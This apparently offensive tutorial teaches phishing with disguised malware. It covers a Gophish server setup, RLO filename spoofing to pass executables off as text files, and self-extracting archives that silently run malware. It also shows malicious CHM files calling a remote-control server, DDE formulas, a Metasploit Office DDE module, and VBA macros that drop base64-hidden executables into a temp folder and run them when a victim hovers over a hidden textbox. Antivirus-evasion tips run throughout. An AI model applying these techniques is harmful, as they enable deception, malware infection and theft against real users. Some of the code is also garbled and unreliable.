This article shows methods of phishing, including setting up a phishing mail server, preparing malware (PE) which deceives the target to access, and preparing evil documents/tables based on Office suite.
Set Up Phishing Mail Server
Buy similar domains, and prepare two server, one for mail server and another for phishing server.
Start server, and it will show the initial username & password.
1 2 3 4 5 6 7 8 9 10 11 12 13
┌──(root💀kali)-[~/gophish] └─# ./gophish time="2022-08-08T16:05:08+08:00" level=warning msg="No contact address has been configured." time="2022-08-08T16:05:08+08:00" level=warning msg="Please consider adding a contact_address entry in your config.json" goose: migrating db environment 'production', current version: 0, target: 20200730000000 OK 20160118194630_init.sql OK 20160131153104_0.1.2_add_event_details.sql ... OK 20200619000000_0.11.0_password_policy.sql OK 20200730000000_0.11.0_imap_ignore_cert_errors.sql time="2022-08-08T16:05:09+08:00" level=info msg="Please login with the username admin and the password e98a19c956ca1cc2" time="2022-08-08T16:05:09+08:00" level=info msg="Starting phishing server at http://0.0.0.0:xxx" time="2022-08-08T16:05:09+08:00" level=info msg="Starting IMAP monitor manager"
FIrst of all we need PE backdoor which can be created by using Pentest Frameworks.
Or we can prepare evil Powershell scripts using MSF, CobaltStrike, Empire and Unicorn, and pack it up as an executable using tools like BAT2EXE.
We can setup to use or leverage the portable version. Add a notepad.exe at the front as a disguise, and remember to set a reliable icon (can be found at Windows 10 Icon theme) and right PE format.
After that we get xxx.exe, and here the most important tip appears – Unicode of RLO. It converts filename to write from the right to the left. Use insert in right click menu, or visit online tools like Unicode Character Table to do it.
For example, if we name a file: Altxt.exe, and insert RLO right before the txt.exe, finally we get name Alexe.txt and it is still a PE file.
Restorator can be used to edit resource of a PE file.
SFX
Create a SFX(SelF-eXtracting) file and compress in some confusing binaries. Set Advanced settings of SFX:
before extraction, run a normal PE; after extraction, run the malware.
configure the silence mode to hide all.
update and overlap files when extracting.
DLL Hijacking & Recreate the Installer
They are also common methods to execute malware, and here provide some sample tools:
In this indirectly calling method, some antivirus softwares can be bypassed. Other methods of calling powershell are also applicable, and encodings like base64 are recommended.
The name of icon of the file should be modified to deceive others.
Evil CHM to Phish
CHM (Microsoft Compiled HTML Help) is the extension used by Windows help files and other files such as e-books. Cybercriminals have been known to abuse vulnerabilities in CHM files to execute arbitrary code. Successful exploitation requires the user is tricked into opening or decompiling a malicious CHM file, which may be used to execute malicious routines the same way a malicious EXE file would.
Attention: a , right after powershell.exe is also needed to avoid error, and take care of conflicts between " and '.
Another method is to leverage MyJSRat. The payload in CHM should connect MyJSRat server (control indirectly), and MyJSRat control the victim to execute powershell backdoor downloading&execution.
The CHM content can be like: (using whitelist and clean traces)
Abbreviation of Object Linking and Embedding, is a compound document standard developed by Microsoft Corporation. It enables you to create objects with one application and then link or embed them in a second application. Embedded objects retain their original formatand links to the application that created them.
In openoffice we can use DDE function: =DDE("cmd";"/C calc";"123") to execute, while in office it is removed.
But we can still use the format application|topic!item to call DDE.
use exploit/windows/fileformat/office_dde_delivery set lport xx set lhost xx.xx.xx.xx
JS
If we insert online videos in word, the item embeddedHtml in word/document.xml of word compressed file will have corresponding html codes. We can modify these html to insert evil javascript, like:
First create a document with template, then create a template which enables macro. Modify the document with template, to let it link to the template we created. Write macro in template xxx.dotm:
1 2 3
Sub AutoOpen() Shell "calc" EndSub
Or find word_rels\settings.xml.rels in xxx.docx which enables template. Set Target as file:///C:\path\to\xxx.dotm, and the protocol can be changed to smb or http.
Sub test2() Dim iFN AsInteger Dim sPath AsString Dim bFileSize AsLong Dim sResult AsString Dim arr() AsByte' bytes array Dim arra() AsByte' bytes array Dim infile, outfile, infileBase AsString infile = "C:\path\to\in.exe" outfile = "C:\path\to\out.exe"
iFN = VBA.FreeFile
bFileSize = VBA.FileLen(infile) 'Debug.Print bFileSize Open infile ForBinary Access Read As iFN arr = InputB(bFileSize, iFN) ' read bytes
infileBase = Base64Encode(arr())
'Debug.Print infileBase
Dim FSO Set FSO = CreateObject("Scripting.FileSystemObject")
Set OutPutFile = FSO.OpenTextFile("C:\path\to\test.txt", 2, True) OutPutFile.Write (infileBase) OutPutFile.Close Set FSO = Nothing
Function fileExist(filePath) Dim fso Set fso = CreateObject("Scripting.FileSystemObject") If fso.fileExists(filePath) Then fileExist = True Else fileExist = False EndIf Set fso = Nothing EndFunction
Function start() Dim filePath AsString filePath = "C:\Windows\temp\aaaaaaa.exe" IfNot fileExist(filePath) Then releaseFile "C:\Windows\temp\aaaaaaa.exe", Replace(ActiveDocument.Shapes(1).TextFrame.TextRange, Chr(13), Empty) releaseFile "C:\Windows\temp\aaaaaaaaaaa.dll", Replace(ActiveDocument.Shapes(2).TextFrame.TextRange, Chr(13), Empty) EndIf runCommand (filePath)
EndFunction
PrivateSub TextBox2_MouseDown(ByVal Button AsInteger, ByVal Shift AsInteger, ByVal X AsSingle, ByVal Y AsSingle) Static i AsInteger i = i + 1 If i < 3Then start EndIf EndSub
PrivateSub TextBox2_MouseMove(ByVal Button AsInteger, ByVal Shift AsInteger, ByVal X AsSingle, ByVal Y AsSingle) Static i AsInteger i = i + 1 If i < 3Then start EndIf EndSub
Remember to hide the textbox with base64 codes, and induce victims to trigger the macro when they click/hover on some textbox (we can expand it into a whole page to make trigger easier). We can also encrypt the VB project to prevent reversing.
